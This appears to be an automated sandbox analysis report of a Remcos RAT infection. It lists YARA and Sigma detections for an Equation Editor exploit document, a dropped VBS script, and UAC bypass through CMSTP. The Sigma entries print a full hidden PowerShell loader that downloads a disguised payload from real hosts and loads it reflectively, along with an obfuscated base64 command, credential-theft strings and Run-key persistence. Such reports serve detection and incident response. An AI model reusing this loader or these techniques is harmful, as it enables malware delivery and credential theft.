Process Memory Space: RegAsm.exe PID: 3212	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: RegAsm.exe PID: 3212	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: RegAsm.exe PID: 3212	Windows_Trojan_Remcos_b296e965	unknown	unknown	0xd371:$a1: Remcos restarted by watchdog! 0xd8cb:$a3: %02i:%02i:%02i:%03i 0xdcfa:$a3: %02i:%02i:%02i:%03i
Click to see the 14 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
11.2.RegAsm.exe.400000.0.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
11.2.RegAsm.exe.400000.0.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
11.2.RegAsm.exe.400000.0.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6c4a8:$a1: Remcos restarted by watchdog! 0x6ca20:$a3: %02i:%02i:%02i:%03i
11.2.RegAsm.exe.400000.0.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x664fc:$str_a1: C:\Windows\System32\cmd.exe 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6656c:$str_b2: Executing file: 0x675ec:$str_b3: GetDirectListeningPort 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x67118:$str_b7: \update.vbs 0x66594:$str_b9: Downloaded file: 0x66580:$str_b10: Downloading file: 0x66624:$str_b12: Failed to upload file: 0x675b4:$str_b13: StartForward 0x675d4:$str_b14: StopForward 0x67070:$str_b15: fso.DeleteFile " 0x67004:$str_b16: On Error Resume Next 0x670a0:$str_b17: fso.DeleteFolder " 0x66614:$str_b18: Uploaded file: 0x665d4:$str_b19: Unable to delete: 0x67038:$str_b20: while fso.FileExists(" 0x66ab1:$str_c0: [Firefox StoredLogins not found]
11.2.RegAsm.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6637c:$s1: CoGetObject 0x66390:$s1: CoGetObject 0x663ac:$s1: CoGetObject 0x70338:$s1: CoGetObject 0x6633c:$s2: Elevation:Administrator!new:
8.2.powershell.exe.4179110.1.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
8.2.powershell.exe.4179110.1.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
8.2.powershell.exe.4179110.1.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x690a8:$a1: Remcos restarted by watchdog! 0x69620:$a3: %02i:%02i:%02i:%03i
8.2.powershell.exe.4179110.1.unpack	REMCOS_RAT_variants	unknown	unknown	0x630fc:$str_a1: C:\Windows\System32\cmd.exe 0x63078:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63078:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63578:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x63da8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6316c:$str_b2: Executing file: 0x641ec:$str_b3: GetDirectListeningPort 0x63b98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x63d18:$str_b7: \update.vbs 0x63194:$str_b9: Downloaded file: 0x63180:$str_b10: Downloading file: 0x63224:$str_b12: Failed to upload file: 0x641b4:$str_b13: StartForward 0x641d4:$str_b14: StopForward 0x63c70:$str_b15: fso.DeleteFile " 0x63c04:$str_b16: On Error Resume Next 0x63ca0:$str_b17: fso.DeleteFolder " 0x63214:$str_b18: Uploaded file: 0x631d4:$str_b19: Unable to delete: 0x63c38:$str_b20: while fso.FileExists(" 0x636b1:$str_c0: [Firefox StoredLogins not found]
8.2.powershell.exe.4179110.1.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x62fe8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x62f7c:$s1: CoGetObject 0x62f90:$s1: CoGetObject 0x62fac:$s1: CoGetObject 0x6cf38:$s1: CoGetObject 0x62f3c:$s2: Elevation:Administrator!new:
11.2.RegAsm.exe.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
11.2.RegAsm.exe.400000.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
11.2.RegAsm.exe.400000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aaa8:$a1: Remcos restarted by watchdog! 0x6b020:$a3: %02i:%02i:%02i:%03i
11.2.RegAsm.exe.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x64afc:$str_a1: C:\Windows\System32\cmd.exe 0x64a78:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64a78:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64f78:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x657a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64b6c:$str_b2: Executing file: 0x65bec:$str_b3: GetDirectListeningPort 0x65598:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65718:$str_b7: \update.vbs 0x64b94:$str_b9: Downloaded file: 0x64b80:$str_b10: Downloading file: 0x64c24:$str_b12: Failed to upload file: 0x65bb4:$str_b13: StartForward 0x65bd4:$str_b14: StopForward 0x65670:$str_b15: fso.DeleteFile " 0x65604:$str_b16: On Error Resume Next 0x656a0:$str_b17: fso.DeleteFolder " 0x64c14:$str_b18: Uploaded file: 0x64bd4:$str_b19: Unable to delete: 0x65638:$str_b20: while fso.FileExists(" 0x650b1:$str_c0: [Firefox StoredLogins not found]
11.2.RegAsm.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x649e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6497c:$s1: CoGetObject 0x64990:$s1: CoGetObject 0x649ac:$s1: CoGetObject 0x6e938:$s1: CoGetObject 0x6493c:$s2: Elevation:Administrator!new:
8.2.powershell.exe.4179110.1.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
8.2.powershell.exe.4179110.1.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
8.2.powershell.exe.4179110.1.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aaa8:$a1: Remcos restarted by watchdog! 0xe32e8:$a1: Remcos restarted by watchdog! 0x6b020:$a3: %02i:%02i:%02i:%03i 0xe3860:$a3: %02i:%02i:%02i:%03i
8.2.powershell.exe.4179110.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x649e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0xdd228:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6497c:$s1: CoGetObject 0x64990:$s1: CoGetObject 0x649ac:$s1: CoGetObject 0x6e938:$s1: CoGetObject 0xdd1bc:$s1: CoGetObject 0xdd1d0:$s1: CoGetObject 0xdd1ec:$s1: CoGetObject 0xe7178:$s1: CoGetObject 0x6493c:$s2: Elevation:Administrator!new: 0xdd17c:$s2: Elevation:Administrator!new:
Click to see the 14 entries

Sigma Signatures

Exploits

Sigma detected: EQNEDT32.EXE connecting to internet

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 192.210.214.26, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1644, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161

Sigma detected: File Dropped By EQNEDT32EXE

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1644, TargetFilename: C:\Users\user\AppData\Roaming\luckymokeykissinglover.vbs

Spreading

Sigma detected: Powershell download payload from hardcoded c2 list

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CMR/77662/62.412.012.291//:ptth' , '1' , 'C:\ProgramData\' , 'RMCD','RegAsm',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CMR/77662/62.412.012.291//:ptth' , '1' , 'C:\ProgramData\' , 'RMCD','RegAsm',''))} }", CommandLine|base64offs

System Summary

Sigma detected: Base64 Encoded PowerShell Command Detected

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDg

Sigma detected: Equation Editor Network Connection

Source: Network Connection

Author: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1644, Protocol: tcp, SourceIp: 192.210.214.26, SourceIsIpv6: false, SourcePort: 80

Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands

Source: Process started

Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CMR/77662/62.412.012.291//:ptth' , '1' , 'C:\ProgramData\' , 'RMCD','RegAsm',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CMR/77662/62.412.012.291//:ptth' , '1' , 'C:\ProgramData\' , 'RMCD','RegAsm',''))} }", CommandLine|base64offs

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Source: Process started

Sigma detected: Script Initiated Connection to Non-Local Network

Source: Network Connection

Author: frack113, Florian Roth: Data: DestinationIp: 104.21.84.67, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 1096, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49162

Sigma detected: Suspicious Microsoft Office Child Process

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\luckymokeykissinglover.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\luckymokeykissinglover.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1644, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\luckymokeykissinglover.vbs" , ProcessId: 1096, ProcessName: wscript.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\luckymokeykissinglover.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\luckymokeykissinglover.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1644, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\luckymokeykissinglover.vbs" , ProcessId: 1096, ProcessName: wscript.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDg

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\RMCD.vbs, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2824, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Path

Sigma detected: Script Initiated Connection

Source: Network Connection

Author: frack113: Data: DestinationIp: 104.21.84.67, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 1096, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49162

Sigma detected: Suspicious Copy From or To System Directory

Source: Process started

